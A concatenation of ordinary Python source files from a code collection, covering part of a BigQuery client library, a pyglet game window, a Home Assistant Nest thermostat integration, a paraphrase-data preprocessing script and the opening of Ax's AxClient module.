https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/insertAll
table (Union[ \
:class:`~google.cloud.bigquery.table.Table` \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The destination table for the row data, or a reference to it.
json_rows (Sequence[dict]):
Row data to be inserted. Keys must match the table schema fields
and values must be JSON-compatible representations.
row_ids (Sequence[str]):
(Optional) Unique ids, one per row being inserted. If omitted,
unique IDs are created.
skip_invalid_rows (bool):
(Optional) Insert all valid rows of a request, even if invalid
rows exist. The default value is False, which causes the entire
request to fail if any invalid rows exist.
ignore_unknown_values (bool):
(Optional) Accept rows that contain values that do not match the
schema. The unknown values are ignored. Default is False, which
treats unknown values as errors.
template_suffix (str):
(Optional) treat ``name`` as a template table and provide a suffix.
BigQuery will create the table ``<name> + <template_suffix>`` based
on the schema of the template table. See
https://cloud.google.com/bigquery/streaming-data-into-bigquery#template-tables
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
Sequence[Mappings]:
One mapping per row with insert errors: the "index" key
identifies the row, and the "errors" key contains a list of
the mappings describing one or more problems with the row.
"""
# Convert table to just a reference because unlike insert_rows,
# insert_rows_json doesn't need the table schema. It's not doing any
# type conversions.
table = _table_arg_to_table_ref(table, default_project=self.project)
rows_info = []
data = {"rows": rows_info}
for index, row in enumerate(json_rows):
info = {"json": row}
if row_ids is not None:
info["insertId"] = row_ids[index]
else:
info["insertId"] = str(uuid.uuid4())
rows_info.append(info)
if skip_invalid_rows is not None:
data["skipInvalidRows"] = skip_invalid_rows
if ignore_unknown_values is not None:
data["ignoreUnknownValues"] = ignore_unknown_values
if template_suffix is not None:
data["templateSuffix"] = template_suffix
# We can always retry, because every row has an insert ID.
response = self._call_api(
retry, method="POST", path="%s/insertAll" % table.path, data=data
)
errors = []
for error in response.get("insertErrors", ()):
errors.append({"index": int(error["index"]), "errors": error["errors"]})
return errors
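# Editor's note: streaming-insert sketch (comments only; the table ID is a
# placeholder). Each dict key must match a column name in the table schema.
#
#     errors = client.insert_rows_json(
#         "my_dataset.my_table", [{"name": "a", "value": 1}]
#     )
#     if errors:
#         raise RuntimeError("row insert failed: {}".format(errors))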
def list_partitions(self, table, retry=DEFAULT_RETRY):
"""List the partitions in a table.
Arguments:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The table or reference from which to get partition info
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
List[str]:
A list of the partition ids present in the partitioned table
"""
table = _table_arg_to_table_ref(table, default_project=self.project)
meta_table = self.get_table(
TableReference(
self.dataset(table.dataset_id, project=table.project),
"%s$__PARTITIONS_SUMMARY__" % table.table_id,
)
)
subset = [col for col in meta_table.schema if col.name == "partition_id"]
return [
row[0]
for row in self.list_rows(meta_table, selected_fields=subset, retry=retry)
]
def list_rows(
self,
table,
selected_fields=None,
max_results=None,
page_token=None,
start_index=None,
page_size=None,
retry=DEFAULT_RETRY,
):
"""List the rows of the table.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/list
.. note::
This method assumes that the provided schema is up-to-date with the
schema as defined on the back-end: if the two schemas are not
identical, the values returned may be incomplete. To ensure that the
local copy of the schema is up-to-date, call ``client.get_table``.
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableListItem`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The table to list, or a reference to it. When the table
object does not contain a schema and ``selected_fields`` is
not supplied, this method calls ``get_table`` to fetch the
table schema.
selected_fields (Sequence[ \
:class:`~google.cloud.bigquery.schema.SchemaField` \
]):
The fields to return. If not supplied, data for all columns
are downloaded.
max_results (int):
(Optional) maximum number of rows to return.
page_token (str):
(Optional) Token representing a cursor into the table's rows.
If not passed, the API will return the first page of the
rows. The token marks the beginning of the iterator to be
returned and the value of the ``page_token`` can be accessed
at ``next_page_token`` of the
:class:`~google.cloud.bigquery.table.RowIterator`.
start_index (int):
(Optional) The zero-based index of the starting row to read.
page_size (int):
Optional. The maximum number of rows in each page of results
from this request. Non-positive values are ignored. Defaults
to a sensible value set by the API.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.table.RowIterator:
Iterator of row data
:class:`~google.cloud.bigquery.table.Row`-s. During each
page, the iterator will have the ``total_rows`` attribute
set, which counts the total number of rows **in the table**
(this is distinct from the total number of rows in the
current page: ``iterator.page.num_items``).
"""
table = _table_arg_to_table(table, default_project=self.project)
if not isinstance(table, Table):
raise TypeError(_NEED_TABLE_ARGUMENT)
schema = table.schema
# selected_fields can override the table schema.
if selected_fields is not None:
schema = selected_fields
# No schema, but no selected_fields. Assume the developer wants all
# columns, so get the table resource for them rather than failing.
elif len(schema) == 0:
table = self.get_table(table.reference, retry=retry)
schema = table.schema
params = {}
if selected_fields is not None:
params["selectedFields"] = ",".join(field.name for field in selected_fields)
if start_index is not None:
params["startIndex"] = start_index
row_iterator = RowIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path="%s/data" % (table.path,),
schema=schema,
page_token=page_token,
max_results=max_results,
page_size=page_size,
extra_params=params,
table=table,
# Pass in selected_fields separately from schema so that full
# tables can be fetched without a column filter.
selected_fields=selected_fields,
)
return row_iterator
def _schema_from_json_file_object(self, file_obj):
"""Helper function for schema_from_json that takes a
file object that describes a table schema.
Returns:
List of schema field objects.
"""
json_data = json.load(file_obj)
return [SchemaField.from_api_repr(field) for field in json_data]
def _schema_to_json_file_object(self, schema_list, file_obj):
"""Helper function for schema_to_json that takes a schema list and file
object and writes the schema list to the file object with json.dump
"""
json.dump(schema_list, file_obj, indent=2, sort_keys=True)
def schema_from_json(self, file_or_path):
"""Takes a file object or file path that contains json that describes
a table schema.
Returns:
List of schema field objects.
"""
if isinstance(file_or_path, io.IOBase):
return self._schema_from_json_file_object(file_or_path)
with open(file_or_path) as file_obj:
return self._schema_from_json_file_object(file_obj)
def schema_to_json(self, schema_list, destination):
"""Takes a list of schema field objects.
Serializes the list of schema field objects as json to a file.
Destination is a file path or a file object.
"""
json_schema_list = [f.to_api_repr() for f in schema_list]
if isinstance(destination, io.IOBase):
return self._schema_to_json_file_object(json_schema_list, destination)
with open(destination, mode="w") as file_obj:
return self._schema_to_json_file_object(json_schema_list, file_obj)
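# Editor's note: round-trip sketch for the schema helpers above; the file path is
# hypothetical and SchemaField is the class already imported by this module.
#
#     schema = [SchemaField("name", "STRING"), SchemaField("value", "INTEGER")]
#     client.schema_to_json(schema, "/tmp/schema.json")
#     fields = client.schema_from_json("/tmp/schema.json")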
# pylint: disable=unused-argument
def _item_to_project(iterator, resource):
"""Convert a JSON project to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a project.
:rtype: :class:`.Project`
:returns: The next project in the page.
"""
return Project.from_api_repr(resource)
# pylint: enable=unused-argument
def _item_to_dataset(iterator, resource):
"""Convert a JSON dataset to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a dataset.
:rtype: :class:`.DatasetListItem`
:returns: The next dataset in the page.
"""
return DatasetListItem(resource)
def _item_to_job(iterator, resource):
"""Convert a JSON job to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a job.
:rtype: job instance.
:returns: The next job in the page.
"""
return iterator.client.job_from_resource(resource)
def _item_to_model(iterator, resource):
"""Convert a JSON model to the native object.
Args:
iterator (google.api_core.page_iterator.Iterator):
The iterator that is currently in use.
resource (dict):
An item to be converted to a model.
Returns:
google.cloud.bigquery.model.Model: The next model in the page.
"""
return Model.from_api_repr(resource)
def _item_to_routine(iterator, resource):
"""Convert a JSON model to the native object.
Args:
iterator (google.api_core.page_iterator.Iterator):
The iterator that is currently in use.
resource (dict):
An item to be converted to a routine.
Returns:
google.cloud.bigquery.routine.Routine: The next routine in the page.
"""
return Routine.from_api_repr(resource)
def _item_to_table(iterator, resource):
"""Convert a JSON table to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that is currently in use.
:type resource: dict
:param resource: An item to be converted to a table.
:rtype: :class:`~google.cloud.bigquery.table.Table`
:returns: The next table in the page.
"""
return TableListItem(resource)
def _make_job_id(job_id, prefix=None):
"""Construct an ID for a new job.
:type job_id: str or ``NoneType``
:param job_id: the user-provided job ID
:type prefix: str or ``NoneType``
:param prefix: (Optional) the user-provided prefix for a job ID
:rtype: str
:returns: A job ID
"""
if job_id is not None:
return job_id
elif prefix is not None:
return str(prefix) + str(uuid.uuid4())
else:
return str(uuid.uuid4())
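# Editor's note: behaviour sketch for the _make_job_id helper above.
#
#     _make_job_id("explicit-id")          # -> "explicit-id"
#     _make_job_id(None, prefix="daily-")  # -> "daily-<uuid4>"
#     _make_job_id(None)                   # -> "<uuid4>"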
def _check_mode(stream):
"""Check that a stream was opened in read-binary mode.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:raises: :exc:`ValueError` if the ``stream.mode`` is a valid attribute
and is not among ``rb``, ``r+b`` or ``rb+``.
"""
mode = getattr(stream, "mode", None)
if isinstance(stream, gzip.GzipFile):
if mode != gzip.READ:
raise ValueError(
"Cannot upload gzip files opened in write mode: use "
"gzip.GzipFile(filename, mode='rb')"
)
else:
if mode is not None and mode not in ("rb", "r+b", "rb+"):
raise ValueError(
"Cannot upload files opened in text mode: use "
"open(filename, mode='rb') or open(filename, mode='r+b')"
)
def _get_upload_headers(user_agent):
"""Get the headers for an upload request.
:type user_agent: str
:param user_agent: The user-agent for requests.
:rtype: dict
:returns: The headers to be used for the request.
"""
return {
"Accept": "application/json",
"Accept-Encoding": "gzip, deflate",
"User-Agent": user_agent,
"content-type": "application/json",
}
|
the-stack_106_16857
|
import pyglet # noqa
from pyglet.gl import * # noqa
from collections import OrderedDict # noqa
from time import time # noqa
from os.path import abspath # noqa
from pyglet.window import key # noqa
import cProfile # noqa
import pstats # noqa
import StringIO # noqa
from time import time, sleep # noqa
from utility import window_height, window_width
from states import StateManager
class Game(pyglet.window.Window):
def __init__(self, height, width):
super(Game, self).__init__(width, height, caption='Acceptable Loss')
self.pr = cProfile.Profile()
self.pr.enable()
pyglet.gl.glClearColor(.8, .8, .8, 1)
self.alive = True
self.framerate = 0, time()
self.count = 0
self.statemanager = StateManager()
def render(self, *args):
self.statemanager.update()
self.clear()
self.statemanager.draw()
self.flip()
def on_draw(self):
self.render()
def on_close(self):
self.alive = False
# def on_key_press(self, symbol, modkey):
# self.state_manager.current.on_key_press(symbol, modkey)
# def on_key_release(self, symbol, modkey):
# self.state_manager.current.on_key_release(symbol, modkey)
def on_mouse_release(self, x, y, button, modifiers):
self.statemanager.on_mouse_release(x, y, button, modifiers)
def on_mouse_press(self, x, y, button, modifiers):
self.statemanager.on_mouse_press(x, y, button, modifiers)
def on_mouse_motion(self, x, y, dx, dy):
self.statemanager.on_mouse_motion(x, y, dx, dy)
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
self.statemanager.on_mouse_drag(x, y, dx, dy, buttons, modifiers)
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
self.statemanager.on_mouse_scroll(x, y, scroll_x, scroll_y)
def run(self):
while self.alive:
event = self.dispatch_events()
if event:
print(event)
self.render()
game = Game(window_height, window_width)
if __name__ == '__main__':
pyglet.clock.set_fps_limit(10)
game.run()
|
the-stack_106_16859
|
"""
Support for Nest thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.nest/
"""
import logging
import voluptuous as vol
from homeassistant.components.nest import DATA_NEST, SIGNAL_NEST_UPDATE
from homeassistant.components.climate import (
STATE_AUTO, STATE_COOL, STATE_HEAT, STATE_ECO, ClimateDevice,
PLATFORM_SCHEMA, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW,
ATTR_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_HIGH, SUPPORT_TARGET_TEMPERATURE_LOW,
SUPPORT_OPERATION_MODE, SUPPORT_AWAY_MODE, SUPPORT_FAN_MODE)
from homeassistant.const import (
TEMP_CELSIUS, TEMP_FAHRENHEIT,
CONF_SCAN_INTERVAL, STATE_ON, STATE_OFF, STATE_UNKNOWN)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
DEPENDENCIES = ['nest']
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SCAN_INTERVAL):
vol.All(vol.Coerce(int), vol.Range(min=1)),
})
NEST_MODE_HEAT_COOL = 'heat-cool'
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Nest thermostat.
No longer in use.
"""
async def async_setup_entry(hass, entry, async_add_devices):
"""Set up the Nest climate device based on a config entry."""
temp_unit = hass.config.units.temperature_unit
thermostats = await hass.async_add_job(hass.data[DATA_NEST].thermostats)
all_devices = [NestThermostat(structure, device, temp_unit)
for structure, device in thermostats]
async_add_devices(all_devices, True)
class NestThermostat(ClimateDevice):
"""Representation of a Nest thermostat."""
def __init__(self, structure, device, temp_unit):
"""Initialize the thermostat."""
self._unit = temp_unit
self.structure = structure
self._device = device
self._fan_list = [STATE_ON, STATE_AUTO]
# Set the default supported features
self._support_flags = (SUPPORT_TARGET_TEMPERATURE |
SUPPORT_OPERATION_MODE | SUPPORT_AWAY_MODE)
# Not all Nest devices support cooling and heating; remove unused modes
self._operation_list = [STATE_OFF]
# Add supported nest thermostat features
if self._device.can_heat:
self._operation_list.append(STATE_HEAT)
if self._device.can_cool:
self._operation_list.append(STATE_COOL)
if self._device.can_heat and self._device.can_cool:
self._operation_list.append(STATE_AUTO)
self._support_flags = (self._support_flags |
SUPPORT_TARGET_TEMPERATURE_HIGH |
SUPPORT_TARGET_TEMPERATURE_LOW)
self._operation_list.append(STATE_ECO)
# feature of device
self._has_fan = self._device.has_fan
if self._has_fan:
self._support_flags = (self._support_flags | SUPPORT_FAN_MODE)
# data attributes
self._away = None
self._location = None
self._name = None
self._humidity = None
self._target_temperature = None
self._temperature = None
self._temperature_scale = None
self._mode = None
self._fan = None
self._eco_temperature = None
self._is_locked = None
self._locked_temperature = None
self._min_temperature = None
self._max_temperature = None
@property
def should_poll(self):
"""Do not need poll thanks using Nest streaming API."""
return False
async def async_added_to_hass(self):
"""Register update signal handler."""
async def async_update_state():
"""Update device state."""
await self.async_update_ha_state(True)
async_dispatcher_connect(self.hass, SIGNAL_NEST_UPDATE,
async_update_state)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._support_flags
@property
def unique_id(self):
"""Return unique ID for this device."""
return self._device.serial
@property
def name(self):
"""Return the name of the nest, if any."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._temperature_scale
@property
def current_temperature(self):
"""Return the current temperature."""
return self._temperature
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
if self._mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
return self._mode
if self._mode == NEST_MODE_HEAT_COOL:
return STATE_AUTO
return STATE_UNKNOWN
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._mode != NEST_MODE_HEAT_COOL and \
self._mode != STATE_ECO and \
not self.is_away_mode_on:
return self._target_temperature
return None
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if (self.is_away_mode_on or self._mode == STATE_ECO) and \
self._eco_temperature[0]:
# eco_temperature is always a low, high tuple
return self._eco_temperature[0]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[0]
return None
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if (self.is_away_mode_on or self._mode == STATE_ECO) and \
self._eco_temperature[1]:
# eco_temperature is always a low, high tuple
return self._eco_temperature[1]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[1]
return None
@property
def is_away_mode_on(self):
"""Return if away mode is on."""
return self._away
def set_temperature(self, **kwargs):
"""Set new target temperature."""
import nest
temp = None
target_temp_low = kwargs.get(ATTR_TARGET_TEMP_LOW)
target_temp_high = kwargs.get(ATTR_TARGET_TEMP_HIGH)
if self._mode == NEST_MODE_HEAT_COOL:
if target_temp_low is not None and target_temp_high is not None:
temp = (target_temp_low, target_temp_high)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
else:
temp = kwargs.get(ATTR_TEMPERATURE)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
try:
if temp is not None:
self._device.target = temp
except nest.nest.APIError as api_error:
_LOGGER.error("An error occurred while setting temperature: %s",
api_error)
# restore target temperature
self.schedule_update_ha_state(True)
def set_operation_mode(self, operation_mode):
"""Set operation mode."""
if operation_mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
device_mode = operation_mode
elif operation_mode == STATE_AUTO:
device_mode = NEST_MODE_HEAT_COOL
else:
device_mode = STATE_OFF
_LOGGER.error(
"An error occurred while setting device mode. "
"Invalid operation mode: %s", operation_mode)
self._device.mode = device_mode
@property
def operation_list(self):
"""List of available operation modes."""
return self._operation_list
def turn_away_mode_on(self):
"""Turn away on."""
self.structure.away = True
def turn_away_mode_off(self):
"""Turn away off."""
self.structure.away = False
@property
def current_fan_mode(self):
"""Return whether the fan is on."""
if self._has_fan:
# Return whether the fan is on
return STATE_ON if self._fan else STATE_AUTO
# No Fan available so disable slider
return None
@property
def fan_list(self):
"""List of available fan modes."""
if self._has_fan:
return self._fan_list
return None
def set_fan_mode(self, fan_mode):
"""Turn fan on/off."""
if self._has_fan:
self._device.fan = fan_mode.lower()
@property
def min_temp(self):
"""Identify min_temp in Nest API or defaults if not available."""
return self._min_temperature
@property
def max_temp(self):
"""Identify max_temp in Nest API or defaults if not available."""
return self._max_temperature
def update(self):
"""Cache value from Python-nest."""
self._location = self._device.where
self._name = self._device.name
self._humidity = self._device.humidity
self._temperature = self._device.temperature
self._mode = self._device.mode
self._target_temperature = self._device.target
self._fan = self._device.fan
self._away = self.structure.away == 'away'
self._eco_temperature = self._device.eco_temperature
self._locked_temperature = self._device.locked_temperature
self._min_temperature = self._device.min_temperature
self._max_temperature = self._device.max_temperature
self._is_locked = self._device.is_locked
if self._device.temperature_scale == 'C':
self._temperature_scale = TEMP_CELSIUS
else:
self._temperature_scale = TEMP_FAHRENHEIT
|
the-stack_106_16866
|
import os
import random
import argparse
import torch
import numpy as np
import Core.Constants as Constants
from Core.Utils import build_vocab_idx, convert_instance_to_idx_seq,\
set_seed_everywhere
from Core.Dataset import read_instances_from_file
def parse_args():
"""
Wrapper function of argument parsing process.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_dir', type=str, default=os.path.join(Constants.DATA_PATH, 'paraphrase/integrated.txt'),
help='dataset location.'
)
parser.add_argument(
'--model_dir', type=str, default=os.path.join(Constants.MODEL_PATH, 'm.para.16000.model'),
help='bpe model location.'
)
parser.add_argument(
'--ori_save_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ori.pt'),
help='source training data save location.'
)
parser.add_argument(
'--ref_save_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ref.pt'),
help='reference training data save location.'
)
parser.add_argument(
'--dict_save_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_dict.pt'),
help='token to index dictionary save location.'
)
parser.add_argument(
'--max_txt_len', type=int, default=50, help='maximum sentence length'
)
parser.add_argument(
'--max_syn_len', type=int, default=50, help='maximum constituency parse length'
)
parser.add_argument(
'--max_src_depth', type=int, default=8, help='maximum constituency parse tree depth'
)
parser.add_argument(
'--max_tmpl_depth', type=int, default=3, help='maximum template parse tree depth'
)
parser.add_argument(
'--min_txt_len', type=int, default=3, help='minimum sentence length'
)
parser.add_argument(
'--min_syn_len', type=int, default=3, help='minimum constituency parse length'
)
parser.add_argument(
'--min_token_count', type=int, default=0, help='minimum appearance time of a token to be registered'
)
parser.add_argument(
'--train_ratio', type=float, default=0.9, help='ratio of instances used for training'
)
parser.add_argument(
'--keep_case', type=bool, default=False, help='whether keep the original case of a word'
)
parser.add_argument(
'--n_lines', type=int, default=np.inf, help='how many lines are going to be used for training and validation'
)
parser.add_argument(
'--random_seed', type=int, default=42
)
args = parser.parse_args()
return args
def main():
""" Main function """
args = parse_args()
set_seed_everywhere(args.random_seed, False)
# Training set
txt_ori, src_syn_ori, src_lvl_ori, tmpl_syn_ori, tmpl_lvl_ori, \
txt_ref, src_syn_ref, src_lvl_ref, tmpl_syn_ref, tmpl_lvl_ref, \
src_tree_path_ori, src_tree_path_ref, tmpl_tree_path_ori, tmpl_tree_path_ref = \
read_instances_from_file(
data_file=args.data_dir,
model_file=args.model_dir,
max_txt_len=args.max_txt_len,
src_syn_depth=args.max_src_depth,
tmpl_syn_depth=args.max_tmpl_depth,
max_syn_len=args.max_syn_len,
min_txt_len=args.min_txt_len,
min_syn_len=args.min_syn_len,
n_lines=args.n_lines,
use_fixed_level=True
)
assert len(txt_ori) == len(src_syn_ori) == len(src_lvl_ori) == \
len(txt_ref) == len(src_syn_ref) == len(src_lvl_ref) == \
len(tmpl_syn_ori) == len(tmpl_lvl_ori) == len(tmpl_syn_ref) == len(tmpl_lvl_ref) == \
len(src_tree_path_ori) == len(src_tree_path_ref) == len(tmpl_tree_path_ori) == len(tmpl_tree_path_ref)
args.max_txt_token_len = max([len(s) for s in txt_ori + txt_ref])
args.max_syn_token_len = max([len(s) for s in src_syn_ori + src_syn_ref])
# shuffle data
data_bag = list(zip(
txt_ori, src_syn_ori, src_lvl_ori, tmpl_syn_ori, tmpl_lvl_ori,
txt_ref, src_syn_ref, src_lvl_ref, tmpl_syn_ref, tmpl_lvl_ref,
src_tree_path_ori, src_tree_path_ref, tmpl_tree_path_ori, tmpl_tree_path_ref
))
random.shuffle(data_bag)
txt_ori, src_syn_ori, src_lvl_ori, tmpl_syn_ori, tmpl_lvl_ori, \
txt_ref, src_syn_ref, src_lvl_ref, tmpl_syn_ref, tmpl_lvl_ref, \
src_tree_path_ori, src_tree_path_ref, tmpl_tree_path_ori, tmpl_tree_path_ref = zip(*data_bag)
if os.path.exists(args.dict_save_dir):
print('[Info] Loading word indices')
w2i = torch.load(args.dict_save_dir)
txt_word2idx = w2i['text']
syn_word2idx = w2i['syntax']
lvl_word2idx = w2i['level']
else:
print('[Info] Indexing words.')
txt_word2idx = build_vocab_idx(txt_ori + txt_ref)
syn_word2idx = build_vocab_idx(src_syn_ori + src_syn_ref)
lvl_word2idx = build_vocab_idx(src_lvl_ori + src_lvl_ref)
n_train_inst = int(round(args.train_ratio * len(txt_ori)))
train_txt_ori = txt_ori[:n_train_inst]
valid_txt_ori = txt_ori[n_train_inst:]
train_src_syn_ori = src_syn_ori[:n_train_inst]
valid_src_syn_ori = src_syn_ori[n_train_inst:]
train_src_lvl_ori = src_lvl_ori[:n_train_inst]
valid_src_lvl_ori = src_lvl_ori[n_train_inst:]
train_tmpl_syn_ori = tmpl_syn_ori[:n_train_inst]
valid_tmpl_syn_ori = tmpl_syn_ori[n_train_inst:]
train_tmpl_lvl_ori = tmpl_lvl_ori[:n_train_inst]
valid_tmpl_lvl_ori = tmpl_lvl_ori[n_train_inst:]
train_src_path_ori = src_tree_path_ori[:n_train_inst]
valid_src_path_ori = src_tree_path_ori[n_train_inst:]
train_tmpl_path_ori = tmpl_tree_path_ori[:n_train_inst]
valid_tmpl_path_ori = tmpl_tree_path_ori[n_train_inst:]
train_txt_ref = txt_ref[:n_train_inst]
valid_txt_ref = txt_ref[n_train_inst:]
train_src_syn_ref = src_syn_ref[:n_train_inst]
valid_src_syn_ref = src_syn_ref[n_train_inst:]
train_src_lvl_ref = src_lvl_ref[:n_train_inst]
valid_src_lvl_ref = src_lvl_ref[n_train_inst:]
train_tmpl_syn_ref = tmpl_syn_ref[:n_train_inst]
valid_tmpl_syn_ref = tmpl_syn_ref[n_train_inst:]
train_tmpl_lvl_ref = tmpl_lvl_ref[:n_train_inst]
valid_tmpl_lvl_ref = tmpl_lvl_ref[n_train_inst:]
train_src_path_ref = src_tree_path_ref[:n_train_inst]
valid_src_path_ref = src_tree_path_ref[n_train_inst:]
train_tmpl_path_ref = tmpl_tree_path_ref[:n_train_inst]
valid_tmpl_path_ref = tmpl_tree_path_ref[n_train_inst:]
# word to index
print('[Info] Converting instances into sequences of word index.')
train_txt_ori = convert_instance_to_idx_seq(train_txt_ori, txt_word2idx)
valid_txt_ori = convert_instance_to_idx_seq(valid_txt_ori, txt_word2idx)
train_src_syn_ori = convert_instance_to_idx_seq(train_src_syn_ori, syn_word2idx)
valid_src_syn_ori = convert_instance_to_idx_seq(valid_src_syn_ori, syn_word2idx)
train_src_lvl_ori = convert_instance_to_idx_seq(train_src_lvl_ori, lvl_word2idx)
valid_src_lvl_ori = convert_instance_to_idx_seq(valid_src_lvl_ori, lvl_word2idx)
train_tmpl_syn_ori = convert_instance_to_idx_seq(train_tmpl_syn_ori, syn_word2idx)
valid_tmpl_syn_ori = convert_instance_to_idx_seq(valid_tmpl_syn_ori, syn_word2idx)
train_tmpl_lvl_ori = convert_instance_to_idx_seq(train_tmpl_lvl_ori, lvl_word2idx)
valid_tmpl_lvl_ori = convert_instance_to_idx_seq(valid_tmpl_lvl_ori, lvl_word2idx)
train_txt_ref = convert_instance_to_idx_seq(train_txt_ref, txt_word2idx)
valid_txt_ref = convert_instance_to_idx_seq(valid_txt_ref, txt_word2idx)
train_src_syn_ref = convert_instance_to_idx_seq(train_src_syn_ref, syn_word2idx)
valid_src_syn_ref = convert_instance_to_idx_seq(valid_src_syn_ref, syn_word2idx)
train_src_lvl_ref = convert_instance_to_idx_seq(train_src_lvl_ref, lvl_word2idx)
valid_src_lvl_ref = convert_instance_to_idx_seq(valid_src_lvl_ref, lvl_word2idx)
train_tmpl_syn_ref = convert_instance_to_idx_seq(train_tmpl_syn_ref, syn_word2idx)
valid_tmpl_syn_ref = convert_instance_to_idx_seq(valid_tmpl_syn_ref, syn_word2idx)
train_tmpl_lvl_ref = convert_instance_to_idx_seq(train_tmpl_lvl_ref, lvl_word2idx)
valid_tmpl_lvl_ref = convert_instance_to_idx_seq(valid_tmpl_lvl_ref, lvl_word2idx)
data_ori = {
'settings': args,
'train': {
'text': train_txt_ori,
'src_syntax': train_src_syn_ori,
'src_level': train_src_lvl_ori,
'src_path': train_src_path_ori,
'tmpl_syntax': train_tmpl_syn_ori,
'tmpl_level': train_tmpl_lvl_ori,
'tmpl_path': train_tmpl_path_ori,
},
'valid': {
'text': valid_txt_ori,
'src_syntax': valid_src_syn_ori,
'src_level': valid_src_lvl_ori,
'src_path': valid_src_path_ori,
'tmpl_syntax': valid_tmpl_syn_ori,
'tmpl_level': valid_tmpl_lvl_ori,
'tmpl_path': valid_tmpl_path_ori,
}
}
data_ref = {
'settings': args,
'train': {
'text': train_txt_ref,
'src_syntax': train_src_syn_ref,
'src_level': train_src_lvl_ref,
'src_path': train_src_path_ref,
'tmpl_syntax': train_tmpl_syn_ref,
'tmpl_level': train_tmpl_lvl_ref,
'tmpl_path': train_tmpl_path_ref,
},
'valid': {
'text': valid_txt_ref,
'src_syntax': valid_src_syn_ref,
'src_level': valid_src_lvl_ref,
'src_path': valid_src_path_ref,
'tmpl_syntax': valid_tmpl_syn_ref,
'tmpl_level': valid_tmpl_lvl_ref,
'tmpl_path': valid_tmpl_path_ref,
}
}
w2i_dict = {
'settings': args,
'text': txt_word2idx,
'syntax': syn_word2idx,
'level': lvl_word2idx
}
print('[Info] Dumping the processed data to pickle file')
torch.save(data_ori, args.ori_save_dir)
torch.save(data_ref, args.ref_save_dir)
torch.save(w2i_dict, args.dict_save_dir)
print('[Info] Finished.')
if __name__ == '__main__':
main()
|
the-stack_106_16869
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import json
import logging
import warnings
from typing import Any, Dict, List, Optional, Tuple, Union
import ax.service.utils.best_point as best_point_utils
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.data import Data
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun
from ax.core.trial import Trial
from ax.core.types import (
TEvaluationOutcome,
TModelPredictArm,
TParameterization,
TParamValue,
)
from ax.modelbridge.dispatch_utils import choose_generation_strategy
from ax.modelbridge.generation_strategy import GenerationStrategy
from ax.modelbridge.modelbridge_utils import get_pending_observation_features
from ax.plot.base import AxPlotConfig
from ax.plot.contour import plot_contour
from ax.plot.exp_utils import exp_to_df
from ax.plot.helper import _format_dict, _get_in_sample_arms
from ax.plot.trace import optimization_trace_single_method
from ax.service.utils.instantiation import (
data_from_evaluations,
make_experiment,
raw_data_to_evaluation,
)
from ax.service.utils.storage import (
load_experiment_and_generation_strategy,
save_experiment_and_generation_strategy,
)
from ax.storage.json_store.decoder import (
generation_strategy_from_json,
object_from_json,
)
from ax.storage.json_store.encoder import object_to_json
from ax.utils.common.docutils import copy_doc
from ax.utils.common.logger import _round_floats_for_logging, get_logger
from ax.utils.common.typeutils import (
checked_cast,
checked_cast_dict,
checked_cast_optional,
not_none,
)
from botorch.utils.sampling import manual_seed
logger = get_logger(__name__)
try: # We don't require SQLAlchemy by default.
from ax.storage.sqa_store.structs import DBSettings
except ModuleNotFoundError: # pragma: no cover
DBSettings = None
class AxClient:
"""
Convenience handler for management of experimentation cycle through a
    service-like API. An external system manages scheduling of the cycle and makes
    calls to this client to get the next suggestion in the experiment and log back
data from the evaluation of that suggestion.
Note: `AxClient` expects to only propose 1 arm (suggestion) per trial; support
